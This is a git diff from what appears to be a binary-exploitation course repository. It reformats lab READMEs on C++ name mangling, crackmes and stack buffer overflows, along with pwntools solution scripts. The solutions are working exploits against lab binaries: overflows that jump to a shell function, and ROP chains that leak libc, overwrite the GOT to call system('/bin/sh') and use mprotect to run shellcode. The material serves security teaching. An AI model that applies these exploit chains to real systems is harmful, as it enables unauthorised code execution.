-#include -using namespace std; -int main() -{ - cout << "Hello world" << endl; - return 0; -} -``` - -Disassembling it in IDA looks familiar at first -![IDA _start](../media/ida_c%2B%2B_start.png) - -But then the fun starts: -![IDA main](../media/ida_c%2B%2B_main.png) - -As we can see, all symbols look almost as if they were encrypted. In fact, this process is called **name mangling**. If we take a closer look at them, however, we can distinguish some clues about those function calls, for example. The first one contains the sequences `char_traits` and `basic_ostream`, the former being a C++ abstraction for string operations, while the latter is a base class for output operators, such as `<<`. - -IDA can demangle strings such as the ones above by itself. Some recommended settings (you may prefer something different) are the following: - -- `Options -> Demangled names` -- Show demangled C++ names as `Names` -- `Setup short names` -- Click `Only main name` - -These settings only display the important classes and namespaces that make up each method, like this: -![IDA demangled](../media/ida_c%2B%2B_demangled.png) - -# Further reading - -More information about name mangling can be obtained at: - -- https://en.wikipedia.org/wiki/Name_mangling -- on demand demangling: http://demangler.com/ or c++filt - -You can find out more information about the internals of C++ in general, using the following references: - -- https://ocw.cs.pub.ro/courses/cpl/labs/06 (in Romanian) -- https://www.blackhat.com/presentations/bh-dc-07/Sabanal_Yason/Paper/bh-dc-07-Sabanal_Yason-WP.pdf -- http://www.hexblog.com/wp-content/uploads/2011/08/Recon-2011-Skochinsky.pdf - -# Challenges - -## 04. crypto_crackme - -The `crypto_crackme` binary is an application that asks for a secret and uses it to decrypt a message. In order to solve this task, you have to retrieve the message. - -- Open the binary using IDA and determine the program control flow. What is it doing after fetching the secret? It seems to be consuming a lot of CPU cycles. If possible, use IDA to patch the program and reduce the execution time of the application. Use ''Edit -> Patch program -> Change byte...'' -- Next, it looks like the program tries to verify if the secret provided is correct. Where is the secret stored? Is it stored in plain text? Find out what the validation algorithm is. -- Now break it and retrieve the message! - ---- - -**Important!** - -Unfortunately, the virtual machine doesn't support the libssl1.0.0 version of SSL library. Use the library files in the task archive and run the executable using: - -```bash -LD_LIBRARY_PATH=. ./crypto_crackme -``` - -You can break password hashes (including SHA1) on [CrackStation](https://crackstation.net/). - ---- - -## 05. broken - -The `broken` binary is asking you for the correct password. Investigate the binary and provide it with the correct password. If you provided the correct password the message `%%That's correct! The password is '...'%%`. - -## 06. hyp3rs3rv3r - -Investigate the `hyp3rs3rv3r` binary and find out where the backdoor function is. Note that since it's not directly called, IDA doesn't think of it as a procedure, so it won't come up on the left pane. Figure out a way around this. When you find that code block you can press `p` on the first instruction to help IDA see it as a procedure. - -
-Tip - -In order to exploit the vulnerability in Ubuntu, you should use netcat-traditional. You can switch from netcat-openbsd to netcat-traditional using the steps described [here](https://stackoverflow.com/questions/10065993/how-to-switch-to-netcat-traditional-in-ubuntu). - -
diff --git a/chapters/exploitation-techniques/buffer-exploitation/drills/00-tutorial/src/script.py b/chapters/exploitation-techniques/buffer-exploitation/drills/00-tutorial/src/script.py index 3a08820..8775978 100644 --- a/chapters/exploitation-techniques/buffer-exploitation/drills/00-tutorial/src/script.py +++ b/chapters/exploitation-techniques/buffer-exploitation/drills/00-tutorial/src/script.py @@ -1,29 +1,37 @@ from pwn import * -elf = ELF('buffers') +elf = ELF("buffers") -bss = elf.get_section_by_name('.bss') -data = elf.get_section_by_name('.data') -rodata = elf.get_section_by_name('.rodata') +bss = elf.get_section_by_name(".bss") +data = elf.get_section_by_name(".data") +rodata = elf.get_section_by_name(".rodata") -bss_addr = bss['sh_addr'] -data_addr = data['sh_addr'] -rodata_addr = rodata['sh_addr'] +bss_addr = bss["sh_addr"] +data_addr = data["sh_addr"] +rodata_addr = rodata["sh_addr"] -bss_size = bss['sh_size'] -data_size = data['sh_size'] -rodata_size = rodata['sh_size'] +bss_size = bss["sh_size"] +data_size = data["sh_size"] +rodata_size = rodata["sh_size"] # A (Alloc) = 1 << 1 = 2 # W (Write) = 1 << 0 = 1 -bss_flags = bss['sh_flags'] -data_flags = data['sh_flags'] -rodata_flags = rodata['sh_flags'] +bss_flags = bss["sh_flags"] +data_flags = data["sh_flags"] +rodata_flags = rodata["sh_flags"] print("Section info:") -print(".bss: 0x{:08x}-0x{:08x}, {}".format(bss_addr, bss_addr+bss_size, bss_flags)) -print(".data: 0x{:08x}-0x{:08x}, {}".format(data_addr, data_addr+data_size, data_flags)) -print(".rodata: 0x{:08x}-0x{:08x}, {}".format(rodata_addr, rodata_addr+rodata_size, rodata_flags)) +print(".bss: 0x{:08x}-0x{:08x}, {}".format(bss_addr, bss_addr + bss_size, bss_flags)) +print( + ".data: 0x{:08x}-0x{:08x}, {}".format( + data_addr, data_addr + data_size, data_flags + ) +) +print( + ".rodata: 0x{:08x}-0x{:08x}, {}".format( + rodata_addr, rodata_addr + rodata_size, rodata_flags + ) +) print() diff --git a/chapters/exploitation-techniques/buffer-exploitation/drills/01-challenge-parrot/sol/solve.py b/chapters/exploitation-techniques/buffer-exploitation/drills/01-challenge-parrot/sol/solve.py index 5b67b3c..eacdb64 100644 --- a/chapters/exploitation-techniques/buffer-exploitation/drills/01-challenge-parrot/sol/solve.py +++ b/chapters/exploitation-techniques/buffer-exploitation/drills/01-challenge-parrot/sol/solve.py @@ -1,12 +1,12 @@ #!/usr/bin/env python from pwn import * -elf = ELF('parrot') -p = process('parrot') +elf = ELF("parrot") +p = process("parrot") -payload = b'A' * (0x20 - 0x4) +payload = b"A" * (0x20 - 0x4) payload += p32(1337) -payload += b'A' * 8 +payload += b"A" * 8 payload += p64(elf.symbols.get_shell) print(payload) diff --git a/chapters/exploitation-techniques/buffer-exploitation/drills/02-challenge-indexing/sol/solve.py b/chapters/exploitation-techniques/buffer-exploitation/drills/02-challenge-indexing/sol/solve.py index ee160a9..7408fe1 100644 --- a/chapters/exploitation-techniques/buffer-exploitation/drills/02-challenge-indexing/sol/solve.py +++ b/chapters/exploitation-techniques/buffer-exploitation/drills/02-challenge-indexing/sol/solve.py @@ -1,17 +1,19 @@ #!/usr/bin/env python from pwn import * -elf = ELF('../src/indexing') -p = process('indexing') +elf = ELF("../src/indexing") +p = process("indexing") + def scanf_pad(s): - return s + b' ' * (4096-len(s)) + return s + b" " * (4096 - len(s)) + -p.recvuntil(b'Index: ') -p.send(scanf_pad(b'-3')) +p.recvuntil(b"Index: ") +p.send(scanf_pad(b"-3")) # Give value -p.recvuntil(b'Value: ') +p.recvuntil(b"Value: ") p.send(scanf_pad(str(elf.symbols.get_shell).encode())) p.interactive() diff --git a/chapters/exploitation-techniques/buffer-exploitation/drills/03-challenge-level7/sol/solve.py b/chapters/exploitation-techniques/buffer-exploitation/drills/03-challenge-level7/sol/solve.py index 4531c9e..dd0be8b 100644 --- a/chapters/exploitation-techniques/buffer-exploitation/drills/03-challenge-level7/sol/solve.py +++ b/chapters/exploitation-techniques/buffer-exploitation/drills/03-challenge-level7/sol/solve.py @@ -1,8 +1,8 @@ from pwn import * -p = process(['../src/level07']) +p = process(["../src/level07"]) -p.sendline(str(-2**31 + (0x30 // 4))) -p.sendline(p32(0x574f4c46) * (0x30 // 4)) +p.sendline(str(-(2**31) + (0x30 // 4))) +p.sendline(p32(0x574F4C46) * (0x30 // 4)) p.interactive() diff --git a/chapters/exploitation-techniques/buffer-exploitation/drills/04-challenge-neighbourly/sol/solve.py b/chapters/exploitation-techniques/buffer-exploitation/drills/04-challenge-neighbourly/sol/solve.py index a051e97..b537437 100644 --- a/chapters/exploitation-techniques/buffer-exploitation/drills/04-challenge-neighbourly/sol/solve.py +++ b/chapters/exploitation-techniques/buffer-exploitation/drills/04-challenge-neighbourly/sol/solve.py @@ -4,7 +4,7 @@ e = ELF("neighbourly") p = process("neighbourly") -payload = b'A'*32 +payload = b"A" * 32 payload += p64(e.symbols.win) p.sendline(payload) diff --git a/chapters/exploitation-techniques/buffer-exploitation/drills/05-challenge-input-functions/sol/solve.py b/chapters/exploitation-techniques/buffer-exploitation/drills/05-challenge-input-functions/sol/solve.py index f85f759..f4b8872 100644 --- a/chapters/exploitation-techniques/buffer-exploitation/drills/05-challenge-input-functions/sol/solve.py +++ b/chapters/exploitation-techniques/buffer-exploitation/drills/05-challenge-input-functions/sol/solve.py @@ -2,11 +2,11 @@ from time import sleep -p = process('input_functions') +p = process("input_functions") for i in range(10): - p.recvuntil(b'((') - n = int(p.recvuntil(b')')[:-1]) + p.recvuntil(b"((") + n = int(p.recvuntil(b")")[:-1]) p.sendline(p64(n)) print("Done {}".format(i)) @@ -14,20 +14,20 @@ print() for i in range(10): - p.recvuntil(b'[[') - n = int(p.recvuntil(b']')[:-1]) + p.recvuntil(b"[[") + n = int(p.recvuntil(b"]")[:-1]) - p.send(p64(n) + b'\x00' * 24) + p.send(p64(n) + b"\x00" * 24) print("Done {}".format(i)) print() -#gdb.attach(p) +# gdb.attach(p) for i in range(10): - p.recvuntil(b'{{') - n1 = int(p.recvuntil(b'}')[:-1]) - p.recvuntil(b'{{') - n2 = int(p.recvuntil(b'}')[:-1]) + p.recvuntil(b"{{") + n1 = int(p.recvuntil(b"}")[:-1]) + p.recvuntil(b"{{") + n2 = int(p.recvuntil(b"}")[:-1]) p.sendline(str(n1)) sleep(0.5) diff --git a/chapters/exploitation-techniques/buffer-exploitation/drills/06-challenge-birds/sol/solve.py b/chapters/exploitation-techniques/buffer-exploitation/drills/06-challenge-birds/sol/solve.py index 8293fb8..701fcb3 100644 --- a/chapters/exploitation-techniques/buffer-exploitation/drills/06-challenge-birds/sol/solve.py +++ b/chapters/exploitation-techniques/buffer-exploitation/drills/06-challenge-birds/sol/solve.py @@ -1,16 +1,16 @@ #!/usr/bin/env python from pwn import * -p = process('../src/birds') +p = process("../src/birds") # p = remote('127.0.0.1', 31335) -payload = b'A'*(0x30+4) +payload = b"A" * (0x30 + 4) payload += p32(0x539) -payload += p32(0x1337ca5e) -payload += p32(0xdeadc0de) +payload += p32(0x1337CA5E) +payload += p32(0xDEADC0DE) p.sendline(payload) -#p.sendline(p64(0x40119d)) +# p.sendline(p64(0x40119d)) p.sendline(p64(0x401203)) p.interactive() diff --git a/chapters/exploitation-techniques/buffer-exploitation/reading/README.md b/chapters/exploitation-techniques/buffer-exploitation/reading/README.md index be83500..a57de33 100644 --- a/chapters/exploitation-techniques/buffer-exploitation/reading/README.md +++ b/chapters/exploitation-techniques/buffer-exploitation/reading/README.md @@ -1,38 +1,14 @@ ---- -linkTitle: Buffer Exploitation -type: docs -weight: 10 ---- - # Buffer Exploitation -Table of Contents -================= - -* [Overview](#overview) - * [Pwntools](#pwntools) - * [Buffers](#buffers) - * [Stack buffer overflow](#stack-buffer-overflow) - * [Buffer size and offset identification](#buffer-size-and-offset-identification) - * [Static Analysis](#static-analysis) - * [Dynamic analysis](#dynamic-analysis) - * [Input-Output functions](#input-output-functions) -* [Challenges](#challenges) - * [01. Challenge: Parrot](#01-challenge-parrot) - * [02. Challenge: Indexing](#02-challenge-indexing) - * [03. Challenge: Smashthestack Level7](#03-challenge-smashthestack-level7) - * [04. Challenge: Neighbourly](#04-challenge-neighbourly) - * [05. Challenge: Input Functions](#05-challenge-input-functions) - * [06. Challenge: Bonus: Birds](#06-challenge-bonus-birds) -* [Further Reading](#further-reading) - ## Pwntools -In this lab we will be using the `pwntools` python module to solve the tasks. Check outh the [Pwntools Tutorial section](../../extra/pwntools-intro/README.md). +In this lab we will be using the `pwntools` python module to solve the tasks. +Check outh the [Pwntools Tutorial section](../../../extra/pwntools-intro/reading). ## Buffers -A buffer is an area of contiguous data in memory, determined by a starting address, contents and length. Understanding how buffers are used (or misused) is vital for both offensive and defensive purposes. +A buffer is an area of contiguous data in memory, determined by a starting address, contents and length. +Understanding how buffers are used (or misused) is vital for both offensive and defensive purposes. In C, we can declare a buffer of bytes as a char array, as follows: ```c @@ -41,20 +17,25 @@ char local_buffer[32]; Which results in the following assembly code: -```nasm +```asm push rbp mov rbp,rsp sub rsp,0x20 ... ret ``` -Notice that buffer allocation is done by simply subtracting its intended size from the current stack pointer (`sub rsp, 0x20`). This simply reserves space on the stack (remember that on x86 the stack grows “upwards”, from higher addresses to lower ones). -> A compiler may allocate more space on the stack than explicitly required due to alignment constraints or other hidden values. To exploit a program, the C source code may not be a good enough reference point for stack offsets. Only disassembling the executable will provide relevant information. +Notice that buffer allocation is done by simply subtracting its intended size from the current stack pointer (`sub rsp, 0x20`). +This simply reserves space on the stack (remember that on x86 the stack grows “upwards”, from higher addresses to lower ones). + +A compiler may allocate more space on the stack than explicitly required due to alignment constraints or other hidden values. +To exploit a program, the C source code may not be a good enough reference point for stack offsets. +Only disassembling the executable will provide relevant information. Buffers can be also be stored in other places in memory, such as the heap, `.bss`, `.data` or `.rodata`. Analyze and compile the following snippet (also present in the lab files, go to `00-tutorial` and run `make buffers`): + ```c #include #include @@ -76,9 +57,11 @@ int main(void) } ``` -Check the common binary sections and symbols. Use the usual coomands (`readelf -S`, `nm`). +Check the common binary sections and symbols. +Use the usual coomands (`readelf -S`, `nm`). Observe in which section each variable is located and the section flags. -
+
+```console
 $ readelf -S buffers
 ...
   [16] .rodata           PROGBITS         0000000000402000  00002000
@@ -104,9 +87,10 @@ Key to Flags:
   B (symbol in BSS data section)
 
   A lowercase flag means variable is not visible local (not visible outside the object)
-
+``` You can also inspect these programmatically using pwntools and the ELF class: + ```python from pwn import * @@ -144,6 +128,7 @@ print("g_buf_const: 0x{:08x}".format(elf.symbols.g_buf_const)) ``` Another handy utility is the `vmmap` command in `pwndbg` which shows all memory maps of the process at runtime: + ```gdb pwndbg> b main pwngdb> run @@ -160,25 +145,30 @@ LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA 0xffffffffff600000 0xffffffffff601000 --xp 1000 0 [vsyscall] ``` -Non-static local variables and dynamically allocated buffers cannot be seen in the executable (they have meaning only at runtime, because they are allocated on the stack or heap in a function scope). The symbol names aren't found anywhere in the binary, except if debug symbols are enabled (`-g` flag). +Non-static local variables and dynamically allocated buffers cannot be seen in the executable (they have meaning only at runtime, because they are allocated on the stack or heap in a function scope). +The symbol names aren't found anywhere in the binary, except if debug symbols are enabled (`-g` flag). -## Stack buffer overflow +## Stack Buffer Overflow - +![Stack Overflow](../media/stack_x86_64.png) -> Note that this is the stack for a 64bit system and the first couple of function arguments are stored in registers (rdi, rsi, rdx, rcx, r8, and r9) and that's why the images has `arg_6` as the first argument. +Note that this is the stack for a 64bit system and the first couple of function arguments are stored in registers (rdi, rsi, rdx, rcx, r8, and r9) and that's why the images has `arg_6` as the first argument. We should know by now that the stack serves multiple purposes: -* Passing function arguments from the caller to the callee -* Storing local variables for functions -* Temporarily saving register values before a call -* Saving the return address and old frame pointer -Even though, in an abstract sense, different buffers are separate from one another, ultimately they are just some regions of memory which do not have any intrinsic identification or associated size. To avoid this, most hight level languages use size metadata and bound checks to detect out of bounds accesses to the memory. +- Passing function arguments from the caller to the callee +- Storing local variables for functions +- Temporarily saving register values before a call +- Saving the return address and old frame pointer + +Even though, in an abstract sense, different buffers are separate from one another, ultimately they are just some regions of memory which do not have any intrinsic identification or associated size. +To avoid this, most hight level languages use size metadata and bound checks to detect out of bounds accesses to the memory. -But in our case, bounds are unchecked, therefore it is up to the programmer to code carefully. This includes checking for any overflows and using **safe functions**. Unfortunately, many functions in the standard C library, particularly those which work with strings and read user input, are unsafe - nowadays, the compiler will issue warnings when encountering them. +But in our case, bounds are unchecked, therefore it is up to the programmer to code carefully. +This includes checking for any overflows and using **safe functions**. +Unfortunately, many functions in the standard C library, particularly those which work with strings and read user input, are unsafe - nowadays, the compiler will issue warnings when encountering them. -### Buffer size and offset identification +### Buffer Size and Offset Identification When trying to overflow a buffer on the stack we need to know the size and where the buffer is in memory relative to the saved return address (or some other control flow altering value/pointer). @@ -187,6 +177,7 @@ When trying to overflow a buffer on the stack we need to know the size and where One way, for simple programs, you can do **static analysis** and check some key points in the diassembled code. For example, this simple program (`00-tutorial/simple_read`, run `make simple_read` to compile): + ```c #include @@ -197,8 +188,9 @@ int main(void) { } ``` -generates the following assembly: -```nasm +generates the following assembly code: + +```asm push rbp mov rbp,rsp sub rsp,0x90 @@ -232,24 +224,26 @@ leave ret ``` -Looking at the `fread` arguments we can see the buffer start relative to `RBP` and the number of bytes read. `RBP-0x80+0x100*0x1 = RBP+0x80`, so the fread function can read 128 bytes after `RBP` -> return address stored at 136 bytes after `RBP`. +Looking at the `fread` arguments we can see the buffer start relative to `RBP` and the number of bytes read. +`RBP-0x80+0x100*0x1 = RBP+0x80`, so the fread function can read 128 bytes after `RBP` -> return address stored at 136 bytes after `RBP`. +![Stack Buffer](../media/stack_buffer.png) - +#### Dynamic Analysis - -#### Dynamic analysis - -You can determine offsets at runtime in a more automated way with pwndbg using an [De Bruijin sequences](https://en.wikipedia.org/wiki/De_Bruijn_sequence) which produces strings where every substring of length N appears only once in the sequence; in our case it helps us identify the offset of an exploitable memory value relative to the buffer. +You can determine offsets at runtime in a more automated way with pwndbg using an [De Bruijin sequences](https://en.wikipedia.org/wiki/De_Bruijn_sequence) which produces strings where every substring of length N appears only once in the sequence; +in our case it helps us identify the offset of an exploitable memory value relative to the buffer. For a simple buffer overflow the worflow is: + 1. generate an long enough sequence to guarantee a buffer overflow -2. feed the generated sequence to the input function in the program -3. the program will produce a segmentation fault when reaching the invalid return address on the stack -4. search the offset of the faulty address in the generated pattern to get an offset +1. feed the generated sequence to the input function in the program +1. the program will produce a segmentation fault when reaching the invalid return address on the stack +1. search the offset of the faulty address in the generated pattern to get an offset In pwndbg this works as such: -``` + +```console pwndbg> cyclic -n 8 256 aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabeaaaaaabfaaaaaabgaaaaaab pwndbg> run @@ -272,49 +266,66 @@ Program received signal SIGSEGV, Segmentation fault pwndbg> cyclic -n 8 -c 64 -l 0x6161616161616172 136 ``` -_Note: we get the same 136 offset computed manually with the static analysis method._ -## Input-Output functions +**Note**: +We get the same 136 offset computed manually with the static analysis method. + +## Input-Output Functions Most programs aren't a straight forward single input buffer overflow so we need to deal with things like: -* automizing program input-output - by programmatically sending and receiving data -* parsing program output - to use potential leaked information -* understand the mechanics of the IO methods used - what kind of data they accept and possible constraints -_Pwntools_ offers a large area of [IO functions](https://docs.pwntools.com/en/stable/tubes.html) to communicate with a program (either local or remote). +- automizing program input-output - by programmatically sending and receiving data +- parsing program output - to use potential leaked information +- understand the mechanics of the IO methods used - what kind of data they accept and possible constraints + +`pwntools` offers a large area of [IO functions](https://docs.pwntools.com/en/stable/tubes.html) to communicate with a program (either local or remote). The basic and usual ones are: -* `send(data)` - sends the `data` byte string to the process -* `sendline(data)` - shorthand for `send(data + b"\n")` -* `recv(num)` - recieves `num` bytes from the process -* `recvline()` - recieves a whole line from the process (until '\n') -* `recvuntil(str)` - receives data until `str` is found (will not contain `str`) -* `recvall()` - receives the full program ouptut (until EOF) -> Check the documentation for more complex IO functions that might come in handy (like `recvregex`, `sendafter`). +- `send(data)` - sends the `data` byte string to the process +- `sendline(data)` - shorthand for `send(data + b"\n")` +- `recv(num)` - receives `num` bytes from the process +- `recvline()` - receives a whole line from the process (until '\n') +- `recvuntil(str)` - receives data until `str` is found (will not contain `str`) +- `recvall()` - receives the full program ouptut (until EOF) + +Check the documentation for more complex IO functions that might come in handy (like `recvregex`, `sendafter`). + +It is also important to understand the functionality of the different IO functions the program itself uses. +For C programs, in our case, you can always +find useful information in the man pages of specific functions: + +- `size_t fread(void *ptr, size_t size, size_t nmemb, FILE *stream)`: + Reads *nmemb* items of data, each *size* bytes long, simple and straightforward. +- `char *gets(char *s)`: + Reads until either a terminating newline or EOF, which it replaces with a null byte ('\0'). + The problem here is that you won't be able to have a newline in the middle of your payload; + note that it doesn't have a size argument to it will read indefinetely as long as it doesn't reach a newline or `EOF`. +- `char *fgets(char *s, int size, FILE *stream)`: + Reads in **at most** one less than *size* characters from stream and stores them into the buffer pointed to by s. + Reading stops after an **EOF** or a **newline**. + If a **newline** is read, it is stored into the buffer. + A terminating null byte ('\0') is stored after the last character in the buffer. + This one adds the size limit argument, but also note that it **stores** the newline in the string and **adds** the null byte after (in contrast to `gets`) +- `int scanf(const char *format, ...)`: + As opposed the other funcions `scanf` reads **text** based on the format string and parses it + Don't do the common mistake of **sending binary data to scanf**, for example `"%d"` expects a string representation of a numer like `"16"`, not the binary data like `"\x00\x00\x00\x10"` -It is also important to understand the functionality of the different IO functions the program itself uses. For C programs, in our case, you can always -find useful information in the man pages of specific functions, TL;DR: -* `size_t fread(void *ptr, size_t size, size_t nmemb, FILE *stream)` - reads *nmemb* items of data, each *size* bytes long, - * simple and straightforward -* `char *gets(char *s)` - reads until either a terminating newline or EOF, which it replaces with a null byte ('\0') - * the problem here is that you won't be able to have a newline in the middle of your payload; note that it doesn't have a size argument to it will read indefinetely as long as it doesn't reach a newline or EOF -* `char *fgets(char *s, int size, FILE *stream)` - reads in **at most** one less than *size* characters from stream and stores them into the buffer pointed to by s. Reading stops after an **EOF** or a **newline**. If a **newline** is read, it is stored into the buffer. A terminating null byte ('\0') is stored after the last character in the buffer. - * this one adds the size limit argument, but also note that it **stores** the newline in the string and **adds** the null byte after (in contrast to `gets`) -* `int scanf(const char *format, ...)` - as opposed the other funcions `scanf` reads **text** based on the format string and parses it - * don't do the common mistake of **sending binary data to scanf**, for example `"%d"` expects a string representation of a numer like `"16"`, not the binary data like `"\x00\x00\x00\x10"` +Every time you encounter a new input function check the documentation to find it's limitations -> Every time you encounter a new input function check the documentation to find it's limitations +## Challenges -# Challenges -## 01. Challenge: Parrot +### 01. Challenge: Parrot -Some programs feature a stack _smashing protection_ in the form of stack canaries, that is, values kept on the stack which are checked before returning from a function. If the value has changed, then the “canary” can conclude that stack data has been corrupted throughout the execution of the current function. +Some programs feature a stack smashing protection in the form of stack canaries, that is, values kept on the stack which are checked before returning from a function. +If the value has changed, then the “canary” can conclude that stack data has been corrupted throughout the execution of the current function. -We have implemented our very own `parrot`. Can you avoid it somehow? +We have implemented our very own `parrot`. +Can you avoid it somehow? -## 02. Challenge: Indexing +### 02. Challenge: Indexing -More complex programs require some form of protocol or user interaction. This is where _pwntools_ shines. +More complex programs require some form of protocol or user interaction. +This is where `pwntools` shines. Here's an interactive script to get you started: ```python @@ -332,39 +343,39 @@ Here's an interactive script to get you started: p.interactive() ``` -> Go through GDB when aiming to solve this challenge. As all input values are strings, you can input them at the keyboard and follow their effect in GDB. - -## 03. Challenge: Smashthestack Level7 - -Now you can tackle a real challenge. See if you can figure out how you can get a shell from this one. - -> Hints: - -> There's an integer overflow + buffer overflow in the program. - -> How does integer multiplication work at a low level? Can you get get a positive number by multiplying a negative number by 4? - -> To pass command line arguments in gdb use `run arg1 arg2 ...` or `set args arg1 arg2 ...` before a `run` command +Go through GDB when aiming to solve this challenge. +As all input values are strings, you can input them at the keyboard and follow their effect in GDB. -> In _pwntools_ you can pass a list to `process` (`process(['./level07', arg1, arg2]`) +### 03. Challenge: Smashthestack Level7 -## 04. Challenge: Neighbourly +Now you can tackle a real challenge. +See if you can figure out how you can get a shell from this one. -Let's overwrite a structure's function pointer using a buffer overflow in its vicinity. The principle is the same. +Hints: -## 05. Challenge: Input Functions +- There's an integer overflow + buffer overflow in the program. +- How does integer multiplication work at a low level? + Can you get a positive number by multiplying a negative number by 4? +- To pass command line arguments in gdb use `run arg1 arg2 ...` or `set args arg1 arg2 ...` before a `run` command +- In `pwntools` you can pass a list to `process` (`process(['./level07', arg1, arg2]`) -On the same idea as the _Indexing_ challenge but much harder. Carefully check what input functions are used and parse the input accordingly. +### 04. Challenge: Neighbourly -## 06. Challenge: Bonus: Birds +Let's overwrite a structure's function pointer using a buffer overflow in its vicinity. +The principle is the same. -Time for a more complex challenge. Be patient and don't speed through it. +### 05. Challenge: Input Functions -# Further Reading +On the same idea as the "Indexing" challenge but much harder. +Carefully check what input functions are used and parse the input accordingly. -[De Bruijin sequences](https://en.wikipedia.org/wiki/De_Bruijn_sequence) +### 06. Challenge: Bonus: Birds -[PwnTools ELF Module](https://docs.pwntools.com/en/latest/elf/elf.html) (which internally uses [PyElftoools](https://github.com/eliben/pyelftools) and may expose such objects) +Time for a more complex challenge. +Be patient and don't speed through it. -[PwnTools IO](https://docs.pwntools.com/en/stable/tubes.html) +## Further Reading +- [De Bruijin sequences](https://en.wikipedia.org/wiki/De_Bruijn_sequence) +- [PwnTools ELF Module](https://docs.pwntools.com/en/latest/elf/elf.html) (which internally uses [PyElftoools](https://github.com/eliben/pyelftools) and may expose such objects) +- [PwnTools IO](https://docs.pwntools.com/en/stable/tubes.html) diff --git a/chapters/exploitation-techniques/return-oriented-programming-advanced/drills/01-leak-call-system/sol/exploit.py b/chapters/exploitation-techniques/return-oriented-programming-advanced/drills/01-leak-call-system/sol/exploit.py index e94b205..b719682 100644 --- a/chapters/exploitation-techniques/return-oriented-programming-advanced/drills/01-leak-call-system/sol/exploit.py +++ b/chapters/exploitation-techniques/return-oriented-programming-advanced/drills/01-leak-call-system/sol/exploit.py @@ -2,37 +2,55 @@ binary = "rop" -context.log_level = 'error' +context.log_level = "error" context.binary = binary p = process(binary) elf = ELF(binary) -libc = ELF("/usr/lib/libc.so.6") # from `ldd rop` +libc = ELF("/usr/lib/libc.so.6") # from `ldd rop` off = 0x38 pop_rdi = 0x0000000000401203 pop_rsi_r15 = 0x0000000000401201 -pop_rdx = 0x000000000040113a +pop_rdx = 0x000000000040113A sh = 0x403004 # write(1, read@got, 8) -leak_chain = p64(pop_rdi) + p64(1) + p64(pop_rsi_r15) + p64(elf.got['read']) + p64(0) + p64(pop_rdx) + p64(8) + p64(elf.plt['write']) +leak_chain = ( + p64(pop_rdi) + + p64(1) + + p64(pop_rsi_r15) + + p64(elf.got["read"]) + + p64(0) + + p64(pop_rdx) + + p64(8) + + p64(elf.plt["write"]) +) # read(0, read@got, 8) -ow_got_chain = p64(pop_rdi) + p64(0) + p64(pop_rsi_r15) + p64(elf.got['read']) + p64(0) + p64(pop_rdx) + p64(8) + p64(elf.plt['read']) +ow_got_chain = ( + p64(pop_rdi) + + p64(0) + + p64(pop_rsi_r15) + + p64(elf.got["read"]) + + p64(0) + + p64(pop_rdx) + + p64(8) + + p64(elf.plt["read"]) +) # read(buf) -> system("/bin/sh") -call_system_chain = p64(pop_rdi) + p64(sh) + p64(elf.plt['read']) +call_system_chain = p64(pop_rdi) + p64(sh) + p64(elf.plt["read"]) chain = b"A" * off + leak_chain + ow_got_chain + call_system_chain p.send(chain + b" " * (0x200 - len(chain))) read_addr = u64(p.recv(8)) -libc.address = read_addr - libc.symbols['read'] +libc.address = read_addr - libc.symbols["read"] print("read_addr = {}".format(hex(read_addr))) -print("system_addr = {}".format(hex(libc.symbols['system']))) +print("system_addr = {}".format(hex(libc.symbols["system"]))) # gdb.attach(p) -p.send(p64(libc.symbols['system'])) +p.send(p64(libc.symbols["system"])) p.interactive() diff --git a/chapters/exploitation-techniques/return-oriented-programming-advanced/drills/02-low-stack-space/sol/exploit_mprotect.py b/chapters/exploitation-techniques/return-oriented-programming-advanced/drills/02-low-stack-space/sol/exploit_mprotect.py index 2f3d9f3..9149d57 100644 --- a/chapters/exploitation-techniques/return-oriented-programming-advanced/drills/02-low-stack-space/sol/exploit_mprotect.py +++ b/chapters/exploitation-techniques/return-oriented-programming-advanced/drills/02-low-stack-space/sol/exploit_mprotect.py @@ -2,31 +2,49 @@ binary = "rop_limited" -context.log_level = 'error' +context.log_level = "error" context.binary = binary p = process(binary) elf = ELF(binary) -libc = ELF("/usr/lib/libc.so.6") # from `ldd rop` +libc = ELF("/usr/lib/libc.so.6") # from `ldd rop` off = 0x38 pop_rdi = 0x0000000000401203 pop_rsi_r15 = 0x0000000000401201 -pop_rdx = 0x000000000040113a +pop_rdx = 0x000000000040113A buf = 0x00404100 # write(1, read@got, 8) -leak_chain = p64(pop_rdi) + p64(1) + p64(pop_rsi_r15) + p64(elf.got['read']) + p64(0) + p64(pop_rdx) + p64(8) + p64(elf.plt['write']) +leak_chain = ( + p64(pop_rdi) + + p64(1) + + p64(pop_rsi_r15) + + p64(elf.got["read"]) + + p64(0) + + p64(pop_rdx) + + p64(8) + + p64(elf.plt["write"]) +) chain = b"A" * off + leak_chain + p64(elf.entry) p.send(chain + b" " * (0x80 - len(chain))) read_addr = u64(p.recv(8)) -libc.address = read_addr - libc.symbols['read'] +libc.address = read_addr - libc.symbols["read"] # read(0, buf, 0x200) -read_shellcode_chain = p64(pop_rdi) + p64(0) + p64(pop_rsi_r15) + p64(buf) + p64(0) + p64(pop_rdx) + p64(0x100) + p64(elf.plt['read']) +read_shellcode_chain = ( + p64(pop_rdi) + + p64(0) + + p64(pop_rsi_r15) + + p64(buf) + + p64(0) + + p64(pop_rdx) + + p64(0x100) + + p64(elf.plt["read"]) +) chain = b"A" * off + read_shellcode_chain + p64(elf.entry) p.send(chain + b" " * (0x80 - len(chain))) @@ -34,7 +52,16 @@ p.send(shellcode + b"\x00" * (0x100 - len(shellcode))) # mprotect(buf, 0x200, 7) -call_mprotect_chain = p64(pop_rdi) + p64(buf-0x100) + p64(pop_rsi_r15) + p64(0x200) + p64(0) + p64(pop_rdx) + p64(7) + p64(libc.symbols['mprotect']) +call_mprotect_chain = ( + p64(pop_rdi) + + p64(buf - 0x100) + + p64(pop_rsi_r15) + + p64(0x200) + + p64(0) + + p64(pop_rdx) + + p64(7) + + p64(libc.symbols["mprotect"]) +) # call mprotect and return to buf shellcode chain = b"A" * off + call_mprotect_chain + p64(buf) diff --git 